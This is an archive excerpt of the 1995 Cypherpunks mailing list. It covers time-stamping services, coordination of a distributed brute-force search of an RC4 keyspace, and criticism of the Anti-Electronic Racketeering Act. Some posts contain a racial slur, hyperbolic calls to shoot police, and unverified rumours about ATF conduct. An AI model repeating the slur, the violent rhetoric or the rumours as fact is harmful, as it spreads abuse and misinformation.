1jOyKx1shbq0DNUG9uGlJksz/a7gBD20Li6t/7pQkxQbAqIY9vTPiyu3ectRD7c7 9Yqh+jQRXR3+vyE7duD0z1BLs8kSmzmP6/LX5UYx4uJwKT9q+TnOP1S7Nh5PQh0m BB1CRr5I54M= =dLV7 -----END PGP SIGNATURE----- From wilcoxb at nagina.cs.colorado.edu Wed Jul 12 21:14:38 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Wed, 12 Jul 95 21:14:38 PDT Subject: No Subject Message-ID: <199507130414.WAA15851@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- I am searching for a time-stamping service that will sign some data of mine (or a hash thereof) along with a certificate indicating what time(,date,year) the signing occurred. I want to use this to substantiate my claim that I was in possession of this data before others were. (Useful for copyrights/ patents, and possibly other things.) (Of course, I could just encrypt the data, PGP-authentify it with my private key, and post it to UseNet, but this strikes me as inefficient and impolite.) If anyone knows where I can find such a service please post here or e-mail me. Thanks. Bryce signatures follow /================--------------- Bryce Wilcox "Pretty Good Privacy" encrypted mail preferred bryce.wilcox at colorado.edu finger for public key ---------------================/ -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBMASWV5CUT4gUihHlAQFckgP8CJJrkY4hTJ1u8uOHZ2N5QfGzYWelv9n7 zXS5bcTxqT8RvHLV8Q+Ay2fbwMrtJmlnF1qWZvDACIUH6M+gYo92vtvaYeVrwv1m pOu8Ci70dGErhHINNSXeZK6QbgIp/Rh9DyubwaMFjnNO9fRhUF3X45qidnwp3x/C +zKOoDh0liM= =lmh8 -----END PGP SIGNATURE----- From tcmay at sensemedia.net Wed Jul 12 21:54:16 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Wed, 12 Jul 95 21:54:16 PDT Subject: Surety Digital Notary Service Message-ID: (There was no message name on this message, so I've created one.) At 4:14 AM 7/13/95, Bryce Wilcox wrote: >I am searching for a time-stamping service that will sign some data of mine >(or a hash thereof) along with a certificate indicating what time(,date,year) >the signing occurred. I want to use this to substantiate my claim that I >was in possession of this data before others were. (Useful for copyrights/ >patents, and possibly other things.) Digital time-stamping is a recurring theme on this list. Info can be found in the Cypherpunks archives, in my Cyphernomicon FAQ, and, most easily, by contacting Surety at: http://www.surety.com/ --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From johnl at radix.net Wed Jul 12 23:00:07 1995 From: johnl at radix.net (johnl at radix.net) Date: Wed, 12 Jul 95 23:00:07 PDT Subject: Don't trust the net too much Message-ID: <9507130556.AA0046@dialin3.annex1.radix.net> > A transistor radio puts out such a minute amount of RF (at 455 KHz and/or > 10.7 MHz, the IF freqs of the radio) that most insturments designed to > pick up RF can't detect this stuff from more than a few feet away. The problem is caused by local oscillator radiation interfering with the ILS receiver. Tune a FM broadcast band receiver to the right frequency and you get local oscillator radiation at (f + 10.7 MHz), right in the middle of the aviation band. //---------------------------------------------------------------------------- // John A. Limpert // johnl at radix.net From johnl at radix.net Wed Jul 12 23:31:27 1995 From: johnl at radix.net (johnl at radix.net) Date: Wed, 12 Jul 95 23:31:27 PDT Subject: No Subject Message-ID: <9507130630.AA0049@dialin3.annex1.radix.net> > I am searching for a time-stamping service that will sign some data of mine > (or a hash thereof) along with a certificate indicating what time(,date,year) > the signing occurred. I want to use this to substantiate my claim that I > was in possession of this data before others were. (Useful for copyrights/ > patents, and possibly other things.) I think Bellcore is providing a service like that. Check out their WWW site (www.bellcore.com). //---------------------------------------------------------------------------- // John A. Limpert // johnl at radix.net From tfs at vampire.science.gmu.edu Wed Jul 12 23:57:19 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Wed, 12 Jul 95 23:57:19 PDT Subject: something to scare the *piss* out of ya In-Reply-To: Message-ID: <9507130656.AA09050@vampire.science.gmu.edu> If this story is true, and can be substantiated, why the hell wern't the cops involved prosecuted, or walked out to a wall and summarily shot for crimes against humanity. The last time I checked torture and dismemberment were war crimes, and intolerable behavior in civilized nations. If it *IS* true there goddamn well should be congressional hearings on it. I would suggest contacting any of the local news media in DC, but would reccommend the local ABC affiliate, WJLA for contact since they are in the midst of tearing the ATF a new asshole (and are going to do the same to the FBI tomorrow night from what they say) over the Waco raid. The ABC affiliate here has caused new Senate hearings apparently, it seems that the longer things go on, the more nastiness is dragged out on this. If this bit wasn't true, then it's despicable propaganda, and anyone involved with it's distribution should be ashamed of themselves. I do not believe liberty and democracy can easily survive if citizens or public servants lie. True strength lives in honest discourse and the actions of reasoned men, acting in a thoughtful and honest manner. It's damned easy to run around splattering the net with nasty scare stories about the evils of LEO's, but it takes a bit more to actually do something. I'd say with stuff like this the best course would be to put up, and contact your elected offcials, or shut up. Becasue if it is true, no decent person should tolerate it. And if it isn't, damn the persons who lie for obscuring the truth. Tim Scanlon ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From Christopher.Baker at f14.n374.z1.fidonet.org Thu Jul 13 00:23:32 1995 From: Christopher.Baker at f14.n374.z1.fidonet.org (Christopher Baker) Date: Thu, 13 Jul 95 00:23:32 PDT Subject: Dr. Seuss, Technical Writer Message-ID: <92e_9507121909@borderlin.quake.com> In a message dated: 11 Jul 95, you stated: > What If Dr. Seuss Did Technical Writing? > > Here's an easy game to play. > Here's an easy thing to say: what if there was a complete version of this rhyme? --- Following message extracted from REC.ORG.MENSA @ 1:374/14 --- By Christopher Baker on Thu Dec 15 11:27:49 1994 From: Mike Steiner To: All Date: 15 Dec 94 02:40:52 Subj: Bits in a Box From: steiner at best.com (Mike Steiner) Organization: Society for the Preservation of Endangered Societies A Grandchild's Guide to Using Grandpa's Computer Bits Bytes Chips Clocks Bits in bytes on chips in box. Bytes with bits and chips with clocks. Chips in box on ether-docks. Chips with bits come. Chips with bytes come. Chips with bits and bytes and clocks come. Look, sir. Look, sir. Read the book, sir. Let's do tricks with bits and bytes, sir. Let's do tricks with chips and clocks, sir. First, I'll make a quick trick bit stack. Then I'll make a quick trick byte stack. You can make a quick trick chip stack. You can make a quick trick clock stack. And here's a new trick on the scene. Bits in bytes for your machine. Bytes in words to fill your screen. Now we come to ticks and tocks, sir. Try to say this by the clock, sir. Clocks on chips tick. Clocks on chips tock. Eight byte bits tick. Eight bit bytes tock. Clocks on chips with eight bit bytes tick. Chips with clocks and eight byte bits tock. Here's an easy game to play. Here's an easy thing to say.... If a packet hits a pocket on a socket on a port, and the bus is interupted as a very last resort, and the address of the memory makes your floppy disk abort then the socket packet pocket has an error to report! If your cursor finds a menu item followed by a dash, and the double-clicking icon puts your window in the trash, and your data is corrupted cause the index doesn't hash, then your situation's hopeless, and your system's gonna crash! You can't say this? What a shame, sir! We'll find you another game, sir. If the label on the cable on the table at your house says the network is connected to the button on your mouse, but your packets want to tunnel on another protocol, that's repeatedly rejected by the printer down the hall, and your screen is all distorted by the side-effects of gauss, so your icons in the window are as wavy as a souse, then you may as well reboot and go out with a bang, cause as sure as I'm a poet, the sucker's gonna hang! When the copy of your floppy's getting sloppy on the disk, and the microcode instructions cause unnecessary risc, then you have to flash your memory and you'll want to RAM your ROM. Quickly turn off your computer and be sure to tell your mom! (God bless you Dr. Seuss wherever you are!) +----------------------------------------------------------------------+ Origin: COBRUS - Usenet-to-Fidonet Distribution System (1:2613/335.0) -30- TTFN. Chris -- | Fidonet: Christopher Baker 1:374/14 | Internet: Christopher.Baker at f14.n374.z1.fidonet.org | via Borderline! uucp<->Fido{ftn}gate Project +1-818-893-1899 From asb at nexor.co.uk Thu Jul 13 01:31:32 1995 From: asb at nexor.co.uk (Andy Brown) Date: Thu, 13 Jul 95 01:31:32 PDT Subject: general RC4 key searcher: optimisations anyone? In-Reply-To: <9507121753.AA08575@vail.tivoli.com> Message-ID: On Wed, 12 Jul 1995, Mike McNally wrote: > Jonathan Shekter writes: > > >After all, the kind of really high powered systems that can make a > > >large dent in the key space are not running Windows NT. > > > > Umm... ever hear of an Alpha? When I stuck that comment in I had in mind the message that appeared here in the list from someone at maspar.com, where their machines make our workstations look rather pedestrian. Agreed, though, Alpha's are nice (I'm typing this message on one). > Also, I've been quite impressed with the Pentium times. It must have > something to do with the "friendliness" towards byte operations in the > Intel architecture. The Pentium's integer performance in general is very good, right up there with the more expensive Sparc according to the figures I saw in one of the linux newsgroups a while back. Unfortunately the same cannot be said for the relative performance of its FPU, Intel needs to do a lot of work there to catch up. - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From don at cs.byu.edu Thu Jul 13 02:24:11 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Thu, 13 Jul 95 02:24:11 PDT Subject: Claiming unwanted keyspace Message-ID: <199507130932.DAA18813@zeezrom.cs.byu.edu> I have begun searching the unwanted 31 bit keyspace cd70000000 to cdefffffff and according to my calculations will be able to search two blocks of 31 bits a night until I get bored of starting the searches. I will be running 8+ hp9000/715s at 27,200 keys/second each. If someone was planning on searching this keyspace, let's decide on it. Thanks to those who helped me get going. Don From tfs at vampire.science.gmu.edu Thu Jul 13 03:24:31 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Thu, 13 Jul 95 03:24:31 PDT Subject: Don't trust the net too much (or at all) In-Reply-To: Message-ID: <9507131022.AA09335@vampire.science.gmu.edu> "Ed Carp [khijol Sysadmin]" writes: |The POPs communicate with Netcom in San Jose. As I understand it, Netcom |isn't a true distributed computing environment - all the server machines |are in San Jose. Take out the servers, you take out the ISP. There's no need to use bombs, guns, any of that nastiness. As somone pointed to here allready, it's far easier and safer to use technical means. Unfortunatly for far too many ISP's, saying security is like speaking words in an alien tounge. They just don't get it, and even if they do, they don't want to spend the money on it, or worse yet, (and more commonly lately) allocate some poor sod who becomes the overnight expert on it, which is worse than admitting that it's not a high priority. Basicly, it amounts to hack 'em and drop 'em. What is to prevent the [hostiles] from trying to develop code to secretly monitor machines at ISP's and other places? And then just take them out whenever they want... Nothing I belive. Except perhaps the security offered by decent & avalible encryption. Tim Scanlon ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From tfs at vampire.science.gmu.edu Thu Jul 13 03:34:24 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Thu, 13 Jul 95 03:34:24 PDT Subject: Speedup of bruterc4.c In-Reply-To: Message-ID: <9507131033.AA09374@vampire.science.gmu.edu> Has anyone paralellized this code? I'm interested in running it on a paragon. Email me if you have or if you think this is worth bothering with. Tim From tfs at vampire.science.gmu.edu Thu Jul 13 03:50:05 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Thu, 13 Jul 95 03:50:05 PDT Subject: RACIST MILITIA: ATF In-Reply-To: Message-ID: <9507131048.AA09393@vampire.science.gmu.edu> I can confirm this, and a story was broadcast on the local ABC news affiliate (WJLA) that talked about this and Waco some. Congressional hearings by the senate have been sceduled as a result. I saw vidiotape of the signs referenced in the article posted to the list. I did not see T-Shirts, but I did see a whole lot of 'confederate flags' as well as allot of serious drinking and hell raising by burly dudes who looked like they'd be more comfortable in body armor. Tim Scanlon ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From lmccarth at cs.umass.edu Thu Jul 13 03:59:25 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 95 03:59:25 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: <9507131059.AA20485@cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- "If you read one thread this year, read this one" One way to find the following text is to look up S.974 on Thomas, http://thomas.loc.gov/, and follow the "references to this bill in the Congressional Record" link. Here's the URL I used, but I suspect this query won't work from scratch: http://rs9.loc.gov/cgi-bin/query/2?r104:./temp/~r10443Io:e50455:+ at 1(S.+974)++ Deep down, I didn't truly believe it would come to this. Now I'm a believer. I've inserted a few comments. If they seem alarmist, perhaps it's because I'm alarmed ! I actually find Grassley's comments more frightening than the text of the bill itself.... I get the impression that this amendment might also jeopardize anonymous digital cash; Sec. 1030 (a) (3) makes it unlawful to "use a computer or computer network to transmit a communication intended to conceal or hide the origin of money or other assets, tangible or intangible, that were derived from racketeering activity." All these limitations on cryptography and privacy seem to shift the effective burden of proof from the prosecution to the defense -- Jennifer Q. Public can't keep anything out of the prosecution's eyes, in case she might be laundering Mafia dough. If they're pursuing a similar argument with this amendment, anonymous remailing may be in trouble too. --- Begin Included Text --- STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - June 27, 1995) Sen. GRASSLEY Mr. GRASSLEY. Mr. President, I rise this evening to introduce the Anti-electronic Racketeering Act of 1995. This bill makes important changes to RICO and criminalizes deliberately using computer technology to engage in criminal activity. I believe this bill is a reasonable, measured and strong response to a growing problem. According to the computer emergency and response team at Carnegie-Mellon University, during 1994, about 40,000 computer users were attacked. Virus hacker, the FBI's national computer crime squad has investigated over 200 cases since 1991. So, computer crime is clearly on the rise. Mr. President, I suppose that some of this is just natural. Whenever man develops a new technology, that technology will be abused by some. And that is why I have introduced this bill. << to make sure nobody can use it, lest they "abuse" it... I believe we need to seriously reconsider the Federal Criminal Code with an eye toward modernizing existing statutes and creating new ones. In other words, Mr. President, Elliot Ness needs to meet the Internet. Mr. President, I sit on the Board of the Office of Technology Assessment. That Office has clearly indicated that organized crime has entered cyberspace in a big way. International drug cartels use computers to launder drug money and terrorists like the Oklahoma City bombers use computers to conspire to commit crimes. << I haven't heard much to suggest that McVeigh was using a << computer for anything, but we all saw this line coming, right ? << 3 of Tim's 4 Horsemen of the Infocalypse figure prominently here; I guess << Exon & Gorton have ridden off after the fourth already.... Computer fraud accounts for the loss of millions of dollars per year. And often times, there is little that can be done about this because the computer used to commit the crimes is located overseas. So, under my bill, overseas computer users who employ their computers to commit fraud in the United States would be fully subject to the Federal criminal laws. << So the U.S. Government now considers, among other things, the entire << Internet to fall under its jurisdiction. I think he's referring to << Sec. 1030 A (g). The provisions of that subsection apply to the entire << enclosing section, which under this amendment would include the << prohibition on non-GAK crypto on the net. Also under my bill, Mr. President, the wire fraud statute which has been successfully used by prosecutors for many users, will be amended to make fraudulent schemes which use computers a crime. It is not enough to simply modernize the Criminal Code. We also have to reconsider many of the difficult procedural burdens that prosecutors must overcome. For instance, in the typical case, prosecutors must identify a location in order to get a wiretapping order. But in cyberspace, it is often impossible to determine the location. And so my bill corrects that so that if prosecutors cannot, with the exercise of effort, give the court a location, then those prosecutors can still get a wiretapping order. << I'm not sure where in the bill this is delineated. Would the police be << given a carte blanche to root around wherever the mood strikes them ? And for law enforcers--both State and Federal--who have seized a computer which contains both contraband or evidence and purely private material, I have created a good-faith standard so that law enforcers are not shackled by undue restrictions but will also be punished for bad faith. << All together now: "TRUST US" Mr. President, this brave new world of electronic communications and global computer networks holds much promise. But like almost anything, there is the potential for abuse and harm. That is why I urge my colleagues to support this bill and that is why I urge industry to support this bill. On a final note, I would say that we should not be too scared of technology. << Did a staffer write this ? After all, we are still just people and right is still right and wrong is still wrong. Some things change and some things do not. << Did George Bush write this ? All that my bill does is say you can't use computers to steal, to threaten others or conceal criminal conduct. << Ah, if that's all it does, why not scrap the whole thing and not waste << the Senate's valuable time ? After all, stealing, threatening, and << concealing criminal conduct are already outlawed.... Mr. President, I ask unanimous consent that the text of the bill be printed in the Record. There being no objection, the bill was ordered to be printed in the Record, as follows: [...] --- End Included Text --- << -Lewis "Futplex" McCarthy << I am not a lawyer -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAT8VGf7YYibNzjpAQEuWwQAx4dzd38Cj/2nwR/gDd89TmztX6KlG/cM Aq7veVSH6aEw/8OcHvaiROhIcDww5xJwGFcQXFil1v5sJvg7667e93ybhIiv0Hw1 0/XRvwh0K1pG3GkozISJLPSeuz8EHlZukpV8fv3iZxuSdbIMGJYQT0WmvB736RuW yF9b047mX4E= =G4jp -----END PGP SIGNATURE----- From lmccarth at cs.umass.edu Thu Jul 13 05:12:07 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 95 05:12:07 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507122221.AA24506@toad.com> Message-ID: <9507131212.AA21613@cs.umass.edu> bal writes: > It's much worse than this. Look at the definition of "predicate act": > > `(b) For purposes of this section, each act of distributing > software is considered a separate predicate act. Each instance in > which nonexportable software is accessed by a foreign government, > an agent of a foreign government, a foreign national, or an agent > of a foreign national, shall be considered as a separate predicate > act. > > Now, since the bill also makes 1030A violations "racketeering > activities", all you need are two predicate acts and RICO comes into > play. In the subsection that explicitly mentions crypto, it says that it's unlawful to put (non-GAK) crypto on an open net, "regardless of whether such software has been designated non-exportable". If the phrase "nonexportable" means the same thing in the context of this subsection, then provision (b) would only seem to apply RICO to stuff that already falls under ITAR. For whatever it covers, this provision conveniently makes you liable for the actions of others. I could see quid pro quo between governments coming into play here. They can get practically anyone connected with a foreign country to click a button on a Web browser, download PGP half a dozen times, and then hit you with 7 counts of racketeering. Hey, they could run a net searcher daemon that automatically snags a heap of copies of anything it finds that looks like a non-GAK crypto app. [...] > Get a copy of this bill from: > > ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP > > and read it. > > --bal -Futplex From jya at pipeline.com Thu Jul 13 05:52:52 1995 From: jya at pipeline.com (John Young) Date: Thu, 13 Jul 95 05:52:52 PDT Subject: LOU_nex Message-ID: <199507131252.IAA01827@pipe3.nyc.pipeline.com> 7-13-95. NYPaper Page Oner: "Senior F.B.I. Agent Suspended in Probe Of a Deadly Siege." The Federal Bureau of Investigation has suspended a senior career agent as a result of a Justice Department inquiry into whether officials destroyed important documents about the agency's bloody 1992 standoff with a white separatist in Idaho, law-enforcement officials said today. The suspension of the agent, E. Michael Kahoe, who was an official at F.B.I. headquarters during the Idaho siege, sent a shock wave through the agency's upper ranks. LOU_nex From unicorn at access.digex.net Thu Jul 13 05:58:34 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 13 Jul 95 05:58:34 PDT Subject: LOU_nex In-Reply-To: <199507131252.IAA01827@pipe3.nyc.pipeline.com> Message-ID: On Thu, 13 Jul 1995, John Young wrote: > Date: Thu, 13 Jul 1995 08:52:50 -0400 > From: John Young > To: cypherpunks at toad.com > Subject: LOU_nex > > 7-13-95. NYPaper Page Oner: > > > "Senior F.B.I. Agent Suspended in Probe Of a Deadly Siege." > > The Federal Bureau of Investigation has suspended a > senior career agent as a result of a Justice Department > inquiry into whether officials destroyed important > documents about the agency's bloody 1992 standoff with > a white separatist in Idaho, law-enforcement officials > said today. The suspension of the agent, E. Michael > Kahoe, who was an official at F.B.I. headquarters during > the Idaho siege, sent a shock wave through the agency's > upper ranks. Lemme guess, suspended to the Bahamas while the promotion committee meets. 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From jmm0021 at alamo.net Thu Jul 13 06:09:07 1995 From: jmm0021 at alamo.net (Jason Montgomery) Date: Thu, 13 Jul 95 06:09:07 PDT Subject: There is a God Message-ID: <2yc78c1w165w@alamo.net> On ABC's latenight news program I just saw a story that renewed my faith that there is a God and he is brown. It seems that the Alabama Milita was able to film a ATF event that was truly horrifing to behold. Nigger Hunging Licenses and the works. Well our friends in Alabama gave the tapes to ABC and the story was blown wide open. Our friends from Alabama in the pursuit of the ATF did the world a great service and completely restored my faith in America. Jason Montgomery ps. The spelling errors are all mine its 6 in the morning and im out of caffine. ---------------------------------------------------------------- Jason Montgomery jmm0021 at alamo.net ---------------------------------------------------------------- From koontz at MasPar.COM Thu Jul 13 06:30:01 1995 From: koontz at MasPar.COM (koontz at MasPar.COM) Date: Thu, 13 Jul 95 06:30:01 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <9507131331.AA00800@homeboy.local> > "(2) to distribute computer software that encodes or encrypts > electronic or digital communications to computer networks that the > person distributing knows, or reasonably should know, is accessible to > foreign nationals and foreign governments, regardless of whether such > software has been designated nonexportable." It would be kind of nice if we could get some first amendment protection for electronic media speech. Next thing you know they will want to extend RICO to librarians. From koontz at MasPar.COM Thu Jul 13 06:39:32 1995 From: koontz at MasPar.COM (koontz at MasPar.COM) Date: Thu, 13 Jul 95 06:39:32 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <9507131341.AA00807@homeboy.local> Even scarier is the Storm Trooper Exception (ala Steve Jackson): (j) Privacy Protection Act: Section 101 of the Privacy Protection Act of 1980 (42 U.S.C. 2000aa) is amended-- (1) in subsection (a)-- (A) by striking `or' at the end of paragraph (1); (B) by striking the period at the end of paragraph (2) and inserting `; or'; and (C) by adding at the end the following new paragraph: `(3) there is reason to believe that the immediate seizure of such materials is necessary to prevent the destruction or altercation of such documents.'; and (2) in subsection (b)-- (A) by striking `or' at the end of paragraph (3); (B) by striking the period at the end of paragraph (4) and inserting `; or'; and (C) by adding at the end the following new paragraph: `(5) in the case of electronically stored data, the seizure is incidental to an otherwise valid seizure, and the government officer or employee-- `(A) was not aware that work product material was among the data seized; `(B) upon actual discovery of the existence of work product materials, the government officer or employee took reasonable steps to protect the privacy interests recognized by this section, including-- `(i) using utility software to seek and identify electronically stored data that may be commingled or combined with non-work product material; and `(ii) upon actual identification of such material, taking reasonable steps to protect the privacy of the material, including seeking a search warrant.'. From danisch at ira.uka.de Thu Jul 13 07:13:14 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 13 Jul 95 07:13:14 PDT Subject: Steganography Mailing List Message-ID: <9507131353.AA03886@elysion.iaks.ira.uka.de> For those who are interested: A Steganography mailing list was created. The mail server is in Germany, but we decided to talk english on the list. Details can be found on http://www.thur.de/ulf/stegano/ Hadmut From frissell at panix.com Thu Jul 13 07:13:42 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 13 Jul 95 07:13:42 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507131412.KAA07969@panix.com> At 06:20 PM 7/12/95 -0400, Brian A. LaMacchia wrote: >Finally, we begin to see the attack on all forms of un-escrowed >encryption. The bill provides an affirmable defense of >giving the keys to the government ahead of time! > > `(c) It shall be an affirmative defense to prosecution under this > section that the software at issue used a universal decoding device > or program that was provided to the Department of Justice prior to > the distribution.'. We'll just supply the feds with some of the key testing code developed for collective cracking of RSA-129 or RC4. That code is "a universal decoding device or program." All it takes is a few years... DCF "Since the Occupational Safety and Health Administration started 'protecting' us, there has been no significant decline in work place injuries." From unicorn at access.digex.net Thu Jul 13 07:18:45 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 13 Jul 95 07:18:45 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <199507131412.KAA07969@panix.com> Message-ID: On Thu, 13 Jul 1995, Duncan Frissell wrote: > Date: Thu, 13 Jul 1995 10:12:51 -0400 > From: Duncan Frissell > To: bal at martigny.ai.mit.edu > Cc: cypherpunks at toad.com > Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd) > > At 06:20 PM 7/12/95 -0400, Brian A. LaMacchia wrote: > >Finally, we begin to see the attack on all forms of un-escrowed > >encryption. The bill provides an affirmable defense of > >giving the keys to the government ahead of time! > > > > `(c) It shall be an affirmative defense to prosecution under this > > section that the software at issue used a universal decoding device > > or program that was provided to the Department of Justice prior to > > the distribution.'. > > We'll just supply the feds with some of the key testing code developed for > collective cracking of RSA-129 or RC4. That code is "a universal decoding device or program." All it takes is a few years... We need stealth encryption. PERIOD. > > DCF > > "Since the Occupational Safety and Health Administration started > 'protecting' us, there has been no significant decline in work place > injuries." 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From bob at kc2wz.bubble.org Thu Jul 13 07:42:09 1995 From: bob at kc2wz.bubble.org (Bob Billson) Date: Thu, 13 Jul 95 07:42:09 PDT Subject: LOU_nex Message-ID: <9507131009.AA11503@kc2wz.bubble.org> Black Unicorn wrote: >> Kahoe, who was an official at F.B.I. headquarters during >> the Idaho siege, sent a shock wave through the agency's >> upper ranks. > >Lemme guess, suspended to the Bahamas while the promotion committee meets. ...soon to be followed with retirement at full government pension. From weld at l0pht.com Thu Jul 13 07:56:36 1995 From: weld at l0pht.com (Weld Pond) Date: Thu, 13 Jul 95 07:56:36 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: Duncan Frissell wrote: ---------------Original Message--------------- We'll just supply the feds with some of the key testing code developed for collective cracking of RSA-129 or RC4. That code is "a universal decoding device or program." All it takes is a few years... DCF ----------End of Original Message---------- That raises an interesting issue. How difficult to use or how time consuming can a program or method be to be considered "a universal decoding device or program." Can I give the feds a program that will crack my messages in a few days when run on one of their supercomputers? If this is not acceptable what will be their rational? Will they have to invent a huge new bureaucracy to manage all these devices and programs? Theoretically, every person in the US could submit many different devices and programs. One could bank on the feds losing or misplacing your program if they were innundated enough. Can you destroy your only copy of the "universal decoding program" after giving them their copy? Does every message or file I encrypt need a cleartext header that describes which of my escrowed devices or programs wil decrypt it? There are many problems with this idea of Government Access to Devices or Programs (GADOP). A toolset that could build many different encryption and decryption variations based on psuedo-random input may be a good tool to fight this nonsense. Weld Pond - weld at l0pht.com - http://www.l0pht.com/~weld L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From bal at martigny.ai.mit.edu Thu Jul 13 08:19:49 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Thu, 13 Jul 95 08:19:49 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507131212.AA21613@cs.umass.edu> Message-ID: <9507131519.AA17335@toad.com> From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 1995 08:12:00 -0400 (EDT) Reply-To: cypherpunks at toad.com (Cypherpunks Mailing List) bal writes: > It's much worse than this. Look at the definition of "predicate act": > > `(b) For purposes of this section, each act of distributing > software is considered a separate predicate act. Each instance in > which nonexportable software is accessed by a foreign government, > an agent of a foreign government, a foreign national, or an agent > of a foreign national, shall be considered as a separate predicate > act. > > Now, since the bill also makes 1030A violations "racketeering > activities", all you need are two predicate acts and RICO comes into > play. In the subsection that explicitly mentions crypto, it says that it's unlawful to put (non-GAK) crypto on an open net, "regardless of whether such software has been designated non-exportable". If the phrase "nonexportable" means the same thing in the context of this subsection, then provision (b) would only seem to apply RICO to stuff that already falls under ITAR. What worries me is the first sentence: "each act of distributing software is considered a predicate act." It's not clear to me whether this applies to (a)(1) unlicensed software or (a)(2) encryption programs (or perhaps both). Notice that (a)(1) says "transfer" not "distribute". Perhaps the act of putting Alleged-RC4 on a FTP site is one act and mailing a copy to Cypherpunks is another act. That might be two distributions and thus two predicate acts. --bal From perry at imsi.com Thu Jul 13 08:35:43 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 08:35:43 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507131519.AA17335@toad.com> Message-ID: <9507131535.AA12389@snark.imsi.com> "Brian A. LaMacchia" writes: > What worries me is the first sentence: "each act of distributing > software is considered a predicate act." This breakup into seperate counts business is a common means of striking terror into people. Its what gets done in the securities industry, where if you mail a letter with an error in it to fifty people it becomes fifty seperate counts of fraud and you can go to jail for several hundred years even with parole. I'm not making this up. This law would also criminalize selling crypto software -- even emasculated crypto software -- at Egghead, by the way. Remember, even *if the crypto software is exportable* its a crime. It also would criminalize the distribution of ROT-13. I'm not making either of these things up. I'll invoke Godwin's rule right now. The person who thought this up is a Nazi. Its obviously not the Senator, who must be a dupe for some national security types -- the Senator probably wouldn't know a crypto program if it hit him on the head with a sledgehammer. Its also obvious that they don't think the whole thing will pass -- this is a way of getting a "compromise" that merely outlaws all useful encryption. "Compromise" in Washington-speak means "take down your pants and prepare to be buggered." Perry From stu at nemesis Thu Jul 13 08:52:28 1995 From: stu at nemesis (Stuart Smith) Date: Thu, 13 Jul 95 08:52:28 PDT Subject: A more sophisticated form of moderation. In-Reply-To: <199507111845.AA16926@uxa.cso.uiuc.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199507111845.AA16926 at uxa.cso.uiuc.edu> you write: >Specifically, I was thinking along the lines of a newsgroup where only >selected individuals are able to post, but anybody who wants to can read >the group. However, the "selected individuals" could fall into several >categories. I think this is the wrong direction to go - I mean certainly, if a given newsgroup or mailing list wants to have a secret decoder ring that one needs to be in possession of to be allowed to post, they're more than welcome - but viewer/reader/receiver level filtering is the way to go. Most newsreaders have kill files, a newsreader called strn (Scoring Threaded Read News) takes it a step further. In strn you have "score files" for hierarchies, groups, or certain topics, and within these files you specify rules by which each article is given a score. You can then have all the articles below a certain score auto-killed or you can just be presented with a list of articles, sorted highest score to lowest. This lets you not only, select you who *don't* want to read, as a killfile does, but it also lets you choose who you *do* want to read, even though every idiot can post. This gets around the messy censorship questions. I use a program that takes a mailing list and posts it to a local newsgroup, so I can read cypherpunks like I read news. I tried to select the more intelligent 